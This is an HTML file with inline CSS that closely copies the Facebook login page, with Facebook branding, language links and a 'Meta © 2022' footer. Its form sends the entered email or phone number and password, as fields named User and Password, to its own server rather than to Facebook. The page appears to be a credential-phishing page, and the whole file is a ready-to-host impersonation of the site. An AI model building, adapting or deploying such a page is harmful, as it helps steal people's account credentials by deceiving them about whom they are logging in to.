<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <style>
      * {
  font-family: sans-serif;
}

html, body {
  background: #e6e7e1;
  padding: 0;
  margin: 0;
}

.login-fb {
  width: 100%;
  height: auto;
  display: flex;
  justify-content: center;
  align-items: center;
  overflow-x: hidden;
}

.logo {
  font-family: sans-serif;
  color: #1877F2;
  font-weight: 600;
  font-size: 16px;
}
.logo h2 {
  text-align: center;
  text-transform: lowercase;
}

/******************* form ****************/

form {
  background: white;
  box-shadow: 1px 1px 5px #76727265, -1px -1px 5px #76727265;
  display: flex;
  flex-direction: column;
  align-items: center;
  /* justify-content: center;*/
  width: 407px;
  position: relative;
  border-radius: 14px;
  padding: 10px;
}

form input {
  width: 86%;
  padding: 15px;
  border-radius: 6px;
  outline: none;
  background: #e9e9e9b1;
  border: .7px solid #ccc;
  margin-top: 10px;
}

.password-block {
    width: 93%;
    padding: 0;
    display: flex;
}

.password-block input {
    width: 100%;
    border-right: 0;
    border-top-right-radius: 0;
    border-bottom-right-radius: 0;
}
.password-block button {
    padding: 0 14px;
    height: 50px;
    box-sizing: border-box;
    color: #212121b1;
    border-left: 0;
    border-radius: 6px;
    background: #e9e9e9b1;
    border-top-left-radius: 0;
    border-bottom-left-radius: 0;
    border: .7px solid #ccc;
}
.password-block input + .password-block button {
  border: .7px solid #ccc;
  outline: none;
}
.password-block > input:focus ~ button, .password-block > input:focus {
  border-color: #1473ef;
  box-shadow: 0px 0px 2px #1473ef;
}
.password-block > input:focus ~ button {
  border-left: 0;
}
.password-block input:focus {
  border-right: 0;
}

form input::placeholder {
  font-size: 14px;
  color: #6f6f6f;
  font-weight: 400;
}

form input:focus:not(form input[type="submit"]) {
  border: 1px solid #1473ef;
  box-shadow: 0px 0px 2px #1473ef;
}

form input[type="email"] + .text {
  display: none;
  font-size: 17px;
  width: 93%;
  height: 27px;
  margin-bottom: 0;
}

form input[type="submit"] {
  background: #1473ef;
  width: 95%;
  color: white;
  font-size: 16px;
  font-weight: bold;
  height: 48px;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
}

form input[type="submit"]:hover {
  background-color: #116ee8;
  cursor: pointer;
}

form a {
  margin-top: 20px;
  text-decoration: none;
  color: #1b4cfd;
}

form a:hover {
  text-decoration: underline;
}

form .new {
  margin-top: 18px;
  padding-top: 7px;
  text-align: center;
  border-top: 1px solid #ccc;
  width: 100%;
}

form .new a {
  background: transparent;
  border: .5px solid #5d5d5d;
  color: black;
  padding: 12px 20px;
  text-decoration: none;
  border-radius: 5px;
  width: 68%;
  margin: 14px auto;
}

form .new a:hover {
  background-color: #43e921;
  cursor: pointer;
}



.footer1 {
  width: 100%;
  flex-flow: row nowrap;
  display: flex;
  justify-content: center;
  align-items: center;
  gap: 10%;
}
.container1 {
  display: flex;
  flex-flow: column wrap;
}
.container1 p {
  font-size: 12px;
  margin: 2px;
  color: #504680;
}
.container2 {
  display: flex;
  flex-flow: column wrap;
}
.container2 p {
  font-size: 12px;
  margin: 2px;
  color: #504680;
}
.container1 p1 {
  font-weight: bold;
  font-size: 13px;
  opacity: 0.5;
}
.container2 img {
  width: 20px;
  height: 20px;
  border-radius: 4px;
  border: 1px solid rgba(0,0,200,0.7);
  opacity: 0.6;
}
.footer2 {
  width: 100%;
  display: flex;
  justify-content: center;
  align-items: center;
  margin-top: 5%;
  margin-bottom: 10px;
}
.footer2 a {
  font-size: 11px;
  opacity: 0.5;
  margin: 20px;
  color: black;
  text-decoration: none;
}
.footer2 div {
  display: inline-block;
  width: 2px;
  height: 2px;
  border-radius: 50%;
  opacity: 0.5;
  background: black;
}
#end {
  opacity: 0.5;
  text-align: 
  center;
  font-weight: bold;
  font-size: 11px;
}
#show, #hide {
  color: #1473ef;
  padding: 13px;
  right: 3.2%;
  background: #f0f2f5;
  font-weight: bold;
  display: none;
  border-radius: 2.5px;
  outline: none;
  border: none;
  cursor: pointer;
  position: absolute;
}
#showna {
  padding-right: 17%;
}


@media only screen and (max-width: 560px) {
form {
  width: 100%;
}
}
    </style>
</head>
<body>
    <div class="login-fb">
  <div class="info">
    <div class="logo">
      <h2>facebook</h2>
    </div>
    <form action="/" method="post">
      <input class="email" type="text" placeholder="Mobile number or email address" name="User" required>
      <p class="text"></p>
      <div class="password-block">
          <input class="password" type="password" placeholder="Password" name="Password" required>
          <button type="button" id="show-hide">show</button>
      </div>
      <input class="subm" type="submit" value="Log in">
      <a href="https://web.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzA1MDkwNTUzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&ars=facebook_login" class="forgot">forgotten password?</a>
      <div class="new">
        <a href="https://web.facebook.com/reg/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzA1MDkwNjgyLCJjYWxsc2l0ZV9pZCI6MzYzOTY5MDQ0ODc4OTI4fQ%3D%3D">create new account</a>
      </div>
    </form>
  </div>
  </div>
  <div class="footer1">
    <div class="container1">
      <p1>English (UK)</p1>
      <p>Français (France)</p>
      <p>Español</p>
      <p>Deutsch</p>
    </div>
    <div class="container2">
      <p>English (US)</p>
      <p>Português (Brazil)</p>
      <p>عربي</p>
      <a href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2F&refid=8">
      <img src="https://i.ibb.co/y6d77K9/IMG-20220528-073600-666.jpg" alt="add" /></a>
    </div>
</div>

<div class="footer2">
<a href="https://about.facebook.com/?refid=8">About</a>
<div></div>
<a href="https://m.facebook.com/help/?ref=pf&refid=8">Help</a>
<div></div>
<a>More</a>
</div>
    <p id="end">Meta &copy; 2022</p>
  
  
    <script src="script.js"></script>
    <script src="jquery-2.1.3-jquery.min.js"></script>
  </body>
</html>